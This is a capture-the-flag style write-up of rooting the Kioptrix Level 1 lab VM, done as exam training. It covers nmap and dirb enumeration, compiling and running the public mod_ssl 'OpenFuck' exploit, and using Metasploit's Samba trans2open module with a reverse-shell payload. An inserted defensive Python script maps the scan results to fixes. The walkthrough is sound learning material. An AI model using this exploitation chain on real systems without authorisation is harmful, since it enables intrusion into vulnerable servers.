# Write-up: Kioptrix Level 1

This is my first write-up, covering the Kioptrix Level 1 machine from VulnHub, as training for the OSCP.

Description of Kioptrix VM Image Challenges:

You can download the machine from here.

# First Method

## Network Scanning

```
# sudo netdiscover -i eth0
```

The target IP is 192.168.1.104.

## Enumeration

```
┌─[✗]─[le0mx@parrot]─[~]
└──╼ $sudo nmap -A -O -sV 192.168.1.104
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 15:32 EET
Nmap scan report for 192.168.1.104
Host is up (0.00074s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2         111/tcp     rpcbind
|   100000  2         111/udp     rpcbind
|   100024  1         32768/tcp   status
|_  100024  1         32768/udp   status
139/tcp   open  netbios-ssn Samba smbd (workgroup: vMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2020-12-19T14:35:33+00:00; +1h01m49s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:D0:96:D8 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m48s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms 192.168.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.50 seconds
```

Several ports are open: 22 (SSH), 80 (HTTP), 111 (rpcbind), 139 (SMB) and 443 (HTTPS).

For ports 80 and 443, let's look for hidden files and directories with dirb.
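As an added example that is not part of this write-up, the script below runs a small defensive triage over an excerpt of the nmap output above and reports the weaknesses an administrator of this host would want to fix first. The nmap excerpt is constructed from the scan shown above, and the signature table is my own, not nmap's.

```python
import re
from datetime import date

# Constructed excerpt of the nmap -A output shown in the write-up (not the full scan).
NMAP_OUTPUT = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: vMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_Not valid after: 2010-09-26T09:32:06
| SSLv2 supported
"""

# My own signature table: a regex over a port's service line plus its NSE script output,
# and the remediation note to report when it matches.
SIGNATURES = [
    (r"Server supports SSHv1", "SSH protocol 1 enabled; it is broken, allow protocol 2 only"),
    (r"mod_ssl/2\.8\.[0-6]\b", "mod_ssl 2.8.x with a known remote overflow (the write-up's first method); upgrade"),
    (r"OpenSSL/0\.9\.6", "OpenSSL 0.9.6 is end-of-life; upgrade"),
    (r"Apache(?: httpd |/)1\.3\.", "Apache 1.3 is end-of-life; upgrade"),
    (r"Potentially risky methods: TRACE", "HTTP TRACE enabled (cross-site tracing); set TraceEnable off"),
    (r"SSLv2 supported", "SSLv2 enabled; disable it in the mod_ssl configuration"),
    (r"Samba smbd", "nmap printed no Samba version; verify it is not 2.2.x (the write-up's second method hit 2.2.1a)"),
]

def parse_ports(nmap_text):
    """Group nmap -A output into {'NN/tcp': [service line, script lines...]}."""
    ports, current = {}, None
    for line in nmap_text.splitlines():
        m = re.match(r"^(\d+/(?:tcp|udp))\s+open\s", line)
        if m:
            current = m.group(1)
            ports[current] = [line]
        elif current and line.startswith("|"):  # NSE script output belongs to the port above it
            ports[current].append(line)
    return ports

def triage(nmap_text, scan_date_iso):
    """Return [(port, finding)] for every signature hit and every certificate expired at scan time."""
    scan_date = date.fromisoformat(scan_date_iso)
    findings = []
    for port, lines in parse_ports(nmap_text).items():
        blob = "\n".join(lines)
        findings += [(port, note) for pattern, note in SIGNATURES if re.search(pattern, blob)]
        m = re.search(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})", blob)
        if m and date.fromisoformat(m.group(1)) < scan_date:
            findings.append((port, "TLS certificate expired on " + m.group(1)))
    return findings
```

Calling `triage(NMAP_OUTPUT, "2020-12-19")` (the scan date in the write-up) yields eleven findings across ports 22, 80, 139 and 443, including the certificate that expired in 2010.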

```
┌─[✗]─[le0mx@parrot]─[~]
└──╼ $dirb http://192.168.1.104/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 19 16:14:10 2020
URL_BASE: http://192.168.1.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.104/ ----
+ http://192.168.1.104/~operator (CODE:403|SIZE:273)
+ http://192.168.1.104/~root (CODE:403|SIZE:269)
+ http://192.168.1.104/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.1.104/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.1.104/manual/
==> DIRECTORY: http://192.168.1.104/mrtg/
==> DIRECTORY: http://192.168.1.104/usage/

---- Entering directory: http://192.168.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.104/mrtg/ ----
+ http://192.168.1.104/mrtg/index.html (CODE:200|SIZE:17318)

---- Entering directory: http://192.168.1.104/usage/ ----
+ http://192.168.1.104/usage/index.html (CODE:200|SIZE:3704)

-----------------
END_TIME: Sat Dec 19 16:14:28 2020
DOWNLOADED: 13836 - FOUND: 6
```

I found several directories, but after checking them nothing stood out.

However, port 443 is open and running Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b).

Let's check whether a public exploit exists for it. I searched Exploit-DB for this version.

Let's choose the most recently updated exploit (2019-07-07). After downloading it, compile it with the commands below.

```
┌─[✗]─[le0mx@parrot]─[~/Desktop]
└──╼ $gcc 47080.c -o exploit_mod_ssl -lcrypto
┌─[le0mx@parrot]─[~/Desktop]
└──╼ $chmod +x exploit_mod_ssl
```

## Exploitation

Let's check the usage.

```
┌─[le0mx@parrot]─[~/Desktop]
└──╼ $./exploit_mod_ssl

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./exploit_mod_ssl target box [port] [-c N]

  target - supported box eg: 0x00
  box    - hostname or IP address
  port   - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)

  Supported OffSet:
        0x00 - Caldera OpenLinux (apache-1.3.26)
        0x01 - Cobalt Sun 6.0 (apache-1.3.12)
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x03 - Cobalt Sun x (apache-1.3.26)
        0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
        0x05 - Conectiva 4 (apache-1.3.6)
        0x06 - Conectiva 4.1 (apache-1.3.9)
        0x07 - Conectiva 6 (apache-1.3.14)
        0x08 - Conectiva 7 (apache-1.3.12)
        0x09 - Conectiva 7 (apache-1.3.19)
        0x0a - Conectiva 7/8 (apache-1.3.26)
        0x0b - Conectiva 8 (apache-1.3.22)
        0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
        0x0d - Debian GNU Linux (apache_1.3.19-1)
        0x0e - Debian GNU Linux (apache_1.3.22-2)
        0x0f - Debian GNU Linux (apache-1.3.22-2.1)
        0x10 - Debian GNU Linux (apache-1.3.22-5)
        0x11 - Debian GNU Linux (apache_1.3.23-1)
        0x12 - Debian GNU Linux (apache_1.3.24-2.1)
        0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
        0x14 - Debian GNU Linux (apache_1.3.24-3)
        0x15 - Debian GNU Linux (apache-1.3.26-1)
        0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
        0x17 - Debian GNU Linux (apache-1.3.27)
        0x18 - FreeBSD (apache-1.3.9)
        0x19 - FreeBSD (apache-1.3.11)
        0x1a - FreeBSD (apache-1.3.12.1.40)
        0x1b - FreeBSD (apache-1.3.12.1.40)
        0x1c - FreeBSD (apache-1.3.12.1.40)
        0x1d - FreeBSD (apache-1.3.12.1.40_1)
        0x1e - FreeBSD (apache-1.3.12)
        0x1f - FreeBSD (apache-1.3.14)
        0x20 - FreeBSD (apache-1.3.14)
        0x21 - FreeBSD (apache-1.3.14)
        0x22 - FreeBSD (apache-1.3.14)
        0x23 - FreeBSD (apache-1.3.14)
        0x24 - FreeBSD (apache-1.3.17_1)
        0x25 - FreeBSD (apache-1.3.19)
        0x26 - FreeBSD (apache-1.3.19_1)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x2b - FreeBSD (apache-1.3.22)
        0x2c - FreeBSD (apache-1.3.22_7)
        0x2d - FreeBSD (apache_fp-1.3.23)
        0x2e - FreeBSD (apache-1.3.24_7)
        0x2f - FreeBSD (apache-1.3.24+2.8.8)
        0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
        0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
        0x32 - FreeBSD (apache-1.3.27)
        0x33 - Gentoo Linux (apache-1.3.24-r2)
        0x34 - Linux Generic (apache-1.3.14)
        0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
        0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
        0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
        0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
        0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
        0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
        0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
        0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
        0x42 - Mandrake Linux 8.2 (apache-1.3.24)
        0x43 - Mandrake Linux 9 (apache-1.3.26)
        0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
        0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
        0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
        0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
        0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
        0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
        0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
        0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
        0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
        0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
        0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
        0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
        0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
        0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
        0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
        0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
        0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
        0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
        0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
        0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
        0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
        0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
        0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
        0x5b - Redhat Linux 7.x (apache-1.3.22)
        0x5c - RedHat Linux 7.x (apache-1.3.26-1)
        0x5d - RedHat Linux 7.x (apache-1.3.27)
        0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
        0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
        0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
        0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
        0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
        0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
        0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
        0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
        0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
        0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
        0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
        0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
        0x6d - RedHat Linux 7.2 (apache-1.3.24)
        0x6e - RedHat Linux 7.2 (apache-1.3.26)
        0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
        0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
        0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
        0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
        0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
        0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
        0x75 - RedHat Linux 7.3 (apache-1.3.27)
        0x76 - RedHat Linux 8.0 (apache-1.3.27)
        0x77 - RedHat Linux 8.0-second (apache-1.3.27)
        0x78 - RedHat Linux 8.0 (apache-2.0.40)
        0x79 - Slackware Linux 4.0 (apache-1.3.6)
        0x7a - Slackware Linux 7.0 (apache-1.3.9)
        0x7b - Slackware Linux 7.0 (apache-1.3.26)
        0x7c - Slackware 7.0 (apache-1.3.26)2
        0x7d - Slackware Linux 7.1 (apache-1.3.12)
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x7f - Slackware Linux 8.1 (apache-1.3.24)
        0x80 - Slackware Linux 8.1 (apache-1.3.26)
        0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
        0x82 - Slackware Linux (apache-1.3.27)
        0x83 - SuSE Linux 7.0 (apache-1.3.12)
        0x84 - SuSE Linux 7.1 (apache-1.3.17)
        0x85 - SuSE Linux 7.2 (apache-1.3.19)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)
        0x87 - SuSE Linux 8.0 (apache-1.3.23)
        0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
        0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
        0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)

Fuck to all guys who like use lamah ddos. Read SRC to have no surprise.
```

The usage is: `./exploit_mod_ssl target box [port] [-c N]`

According to the supported offset list, our target will be 0x6a or 0x6b:

```
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
```

The number of connections (`-c N`) will be 138, as per the exploit code.

Now, let's try with 0x6a.

Unfortunately, that didn't work, so let's try with 0x6b.

Yeeeeeeeeeeeeeeeees, it's working now and I got root permission.

# Second Method

## Enumeration

I noted that port 139 is running the Samba service; let's check the version, as it may be vulnerable.

```
┌─[✗]─[le0mx@parrot]─[~]
└──╼ $sudo msfconsole
```
```
       https://metasploit.com

       =[ metasploit v6.0.16-dev                          ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

msf6 > search smb_version

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detection


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version
```

I will use auxiliary/scanner/smb/smb_version to get the version.

The version is Samba 2.2.1a. Let's google whether there is a known exploit for it.

Yes, after searching I found an exploit on Rapid7 (Samba trans2open Overflow).

## Exploitation

I set linux/x86/shell_reverse_tcp as the payload; let's set the options.

And let's run the exploit ;)

Awesome, I got root permission again.
